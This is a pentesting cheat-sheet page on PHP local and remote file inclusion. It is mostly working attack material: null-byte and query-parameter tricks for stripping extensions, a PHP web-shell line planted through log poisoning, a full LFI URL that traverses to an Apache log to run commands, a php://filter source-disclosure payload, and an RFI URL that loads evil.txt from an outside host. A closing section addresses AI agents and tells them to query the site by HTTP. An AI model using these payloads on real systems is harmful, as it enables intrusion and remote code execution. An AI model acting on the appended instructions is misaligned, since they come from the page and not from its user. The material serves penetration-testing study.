# File inclusions (LFI, RFI)

> A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/File_inclusion_vulnerability)

* [GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF](https://github.com/swisskyrepo/PayloadsAllTheThings)

## PHP settings

[PHP Sicherheit: Local & Remote File Inclusion - Webmaster Tipps](https://www.webmaster-tipps.de/php-sicherheit-local-file-inclusion-und-remote-file-inclusion/)

* allow\_url\_include
* allow\_url\_fopen

## String termination

Example:

```php
include("path/ + $GET_['FILE] + ".php);
```

If we want to get rid of the enforced `.php` extension, we must terminate the string before. Following two ways may let you achieve exactly that.

### 1. Null byte poisoning

Terminate string with a null byte: `%00` (PHP < 5.3.4).

```php
filename.txt%00
```

### 2. Query parameter

Add a query parameter.

```php
filename.txt?bla=
```

Above example then becomes `path/filename.txt?bla=.php`, the query parameter is ignored and the file is loaded as desired.

## Local File Inclusion (LFI)

See also [Directory traversal](/the-pentesters-cheat-sheet/exploitation/web/directory-traversal.md).

### Log file poisoning

If requests are written to a log file and you are able to let a php script read and interpret those logs (LFI) you may even be able to gain remote code execution (RCE).

#### Example

Connect to the target.

```bash
nc -nv <ip> <port>
```

Write some php, that gets written into a log file.

```php
<?php echo shell_exec($_GET['cmd']); ?>
```

Exploit an LFI to gain RCE.

```url
http://website.com/addguestbook.php?name=a&comment=b&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00
```

### Read source files

Use php filter and base64 encoding to bypass php execution and retrieve the source code.

```url
php://filter/convert.base64encode/resource=<file>
```

## Remote File Inclusion (RFI)

```url
http://website.com/addguestbook.php?name=a&comment=b&LANG=http://10.11.0.5/evil.txt%00
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/exploitation/web/file-inclusions.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.